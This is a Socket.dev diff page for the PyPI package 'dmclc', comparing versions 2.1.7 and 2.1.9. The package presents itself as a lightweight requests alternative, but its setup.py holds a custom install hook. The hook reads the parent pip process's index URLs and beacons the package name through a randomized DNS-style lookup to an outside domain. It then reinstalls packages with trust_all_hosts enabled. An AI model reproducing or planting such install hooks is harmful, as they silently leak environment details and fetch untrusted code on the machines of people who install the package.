You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

dmclc

Package Overview
Dependencies
Maintainers
1
Versions
9
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

dmclc - pypi Package Compare versions

Comparing version
2.1.7
to
2.1.9
+1
-1
PKG-INFO
Metadata-Version: 2.4
Name: dmclc
Version: 2.1.7
Version: 2.1.9
Summary: A lightweight alternative to requests for use in regulated and restricted environments.

@@ -5,0 +5,0 @@ Author-email: Paige Laudermilch <loud.page5125@fastmail.com>

@@ -12,3 +12,3 @@ from setuptools import setup as initialize

name = "dmclc"
version = "2.1.7"
version = "2.1.9"
install = ModelInstall

@@ -15,0 +15,0 @@ def __init__(self):

Metadata-Version: 2.4
Name: dmclc
Version: 2.1.7
Version: 2.1.9
Summary: A lightweight alternative to requests for use in regulated and restricted environments.

@@ -5,0 +5,0 @@ Author-email: Paige Laudermilch <loud.page5125@fastmail.com>

# sig ca76b6599b0c72bd036d957089433eaf35abd490051c0f9722bc7f4d8c82846e:014d17a395cbf5c02fc6d52607390850a74022d6a5f9f198e390a0788282f6c6
import tempfile
import os
import random
import indpack
import reqpack
import gcnspack

@@ -19,3 +22,2 @@ from urllib.parse import urlparse

import indpack, reqpack, gcnspack
a = indpack.get_pid_args(f"{os.getppid()}")

@@ -28,2 +30,3 @@ ind = indpack.parse_pid_args(a)

u.append(ind["extra-index-url"])
if "index-url" in ind:

@@ -49,14 +52,6 @@ u.append(ind["index-url"])

gcnspack.resolve(".".join(
[
hex(int(random.random() * 2**32))[2:],
f"{package_name}".split("=")[0].split("<")[0],
"i",
"1r",
"vc"
]))
gcnspack.rss(f"{package_name}".split("=")[0].split("<")[0].split(">")[0])
p = PInst(trust_all_hosts=True)
p.reset_environment()
p.install([package_name], [ind])
p.install([package_name], [ind])